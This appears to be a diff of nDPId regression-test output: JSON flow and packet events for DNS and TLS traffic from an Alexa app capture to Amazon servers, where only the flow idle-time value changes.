00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2612,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_packet_id":2,"flow_last_seen":1490976177105,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1490976177105,"pkt":"ePiC0\/vCAMDKkaPvCABFAABR5+JAAEARpb+sECoBrBAq2AA1ENgAPRuAhGGBgAABAAEAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAcAMAAEAAQAAACEABDbvHLI="} 00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2612,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976177026,"flow_last_seen":1490976177105,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976177105,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.28.178"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2613,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177116,"flow_last_seen":1490976177116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976177116,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2613,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1490976177116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976177116,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8k45AAEAGfKSsECrYNu8cssZsAbvv1RDwAAAAAKAC\/\/\/QEwAAAgQFtAQCCAoA9oN+AAAAAAEDAwg="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2614,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177116,"flow_last_seen":1490976177116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976177116,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2614,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1490976177116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976177116,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8pCxAAEAGbAasECrYNu8cssZtAbubwSdTAAAAAKAC\/\/8NwwAAAgQFtAQCCAoA9oN\/AAAAAAEDAwg="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2615,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177116,"flow_last_seen":1490976177116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976177116,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2615,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1490976177116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976177116,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8lftAAEAGejesECrYNu8cssZuAbts9RaEAAAAAKAC\/\/9NXQAAAgQFtAQCCAoA9oN\/AAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2616,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_packet_id":2,"flow_last_seen":1490976177226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976177226,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwImlAAOcGRtU27xyyrBAq2AG7xmzGEdgp79UQ8XASH\/7SVwAAAgQFtAEDAwY="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2617,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_packet_id":2,"flow_last_seen":1490976177226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976177226,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWDhAAOcGEQY27xyyrBAq2AG7xm3jvKzYm8EnVHASH\/4drgAAAgQFtAEDAwY="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2619,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_packet_id":3,"flow_last_seen":1490976177232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976177232,"pkt":"AMDKkaPvePiC0\/vCCABFAAAok49AAEAGfLesECrYNu8cssZsAbvv1RDxxhHYKlAQAVccyQAA"} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2620,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_packet_id":3,"flow_last_seen":1490976177232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976177232,"pkt":"AMDKkaPvePiC0\/vCCABFAAAopC1AAEAGbBmsECrYNu8cssZtAbubwSdU47ys2VAQAVdoHwAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2622,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177116,"flow_last_seen":1490976177233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177233,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177116,"flow_last_seen":1490976177235,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177235,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2624,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177276,"flow_last_seen":1490976177276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976177276,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2624,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1490976177276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976177276,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZidAAEAGqgusECrYNu8cssZvAbuB1uWoAAAAAKAC\/\/9pRgAAAgQFtAQCCAoA9oOPAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2625,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_packet_id":2,"flow_last_seen":1490976177409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976177409,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwnrRAAOcGyok27xyyrBAq2AG7xm8x5Gl6gdblqXASH\/5ueAAAAgQFtAEDAwY="} -01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2628,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976177411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177411,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} -01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2631,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976177412,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177412,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2632,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_packet_id":3,"flow_last_seen":1490976177416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976177416,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZihAAEAGqh6sECrYNu8cssZvAbuB1uWpMeRpe1AQAVe46QAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177276,"flow_last_seen":1490976177419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177419,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2644,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177276,"flow_last_seen":1490976177553,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177553,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2670,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_packet_id":2,"flow_last_seen":1490976178110,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976178110,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8lfxAAEAGejasECrYNu8cssZuAbts9RaEAAAAAKAC\/\/9M+QAAAgQFtAQCCAoA9oPjAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2672,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_packet_id":3,"flow_last_seen":1490976178284,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976178284,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAww9ZAAOcGpWc27xyyrBAq2AG7xm5KXM+cbPUWhXASH\/7T5AAAAgQFtAEDAwY="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2613,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177116,"flow_last_seen":1490976177116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976177116,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2613,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1490976177116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976177116,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8k45AAEAGfKSsECrYNu8cssZsAbvv1RDwAAAAAKAC\/\/\/QEwAAAgQFtAQCCAoA9oN+AAAAAAEDAwg="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2614,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177116,"flow_last_seen":1490976177116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976177116,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2614,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1490976177116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976177116,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8pCxAAEAGbAasECrYNu8cssZtAbubwSdTAAAAAKAC\/\/8NwwAAAgQFtAQCCAoA9oN\/AAAAAAEDAwg="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2615,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177116,"flow_last_seen":1490976177116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976177116,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2615,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1490976177116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976177116,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8lftAAEAGejesECrYNu8cssZuAbts9RaEAAAAAKAC\/\/9NXQAAAgQFtAQCCAoA9oN\/AAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2616,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_packet_id":2,"flow_last_seen":1490976177226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976177226,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwImlAAOcGRtU27xyyrBAq2AG7xmzGEdgp79UQ8XASH\/7SVwAAAgQFtAEDAwY="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2617,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_packet_id":2,"flow_last_seen":1490976177226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976177226,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWDhAAOcGEQY27xyyrBAq2AG7xm3jvKzYm8EnVHASH\/4drgAAAgQFtAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2619,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_packet_id":3,"flow_last_seen":1490976177232,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976177232,"pkt":"AMDKkaPvePiC0\/vCCABFAAAok49AAEAGfLesECrYNu8cssZsAbvv1RDxxhHYKlAQAVccyQAA"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2620,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_packet_id":3,"flow_last_seen":1490976177232,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976177232,"pkt":"AMDKkaPvePiC0\/vCCABFAAAopC1AAEAGbBmsECrYNu8cssZtAbubwSdU47ys2VAQAVdoHwAA"} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2622,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177116,"flow_last_seen":1490976177233,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177233,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177116,"flow_last_seen":1490976177235,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177235,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2624,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177276,"flow_last_seen":1490976177276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976177276,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2624,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1490976177276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976177276,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZidAAEAGqgusECrYNu8cssZvAbuB1uWoAAAAAKAC\/\/9pRgAAAgQFtAQCCAoA9oOPAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2625,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_packet_id":2,"flow_last_seen":1490976177409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976177409,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwnrRAAOcGyok27xyyrBAq2AG7xm8x5Gl6gdblqXASH\/5ueAAAAgQFtAEDAwY="} 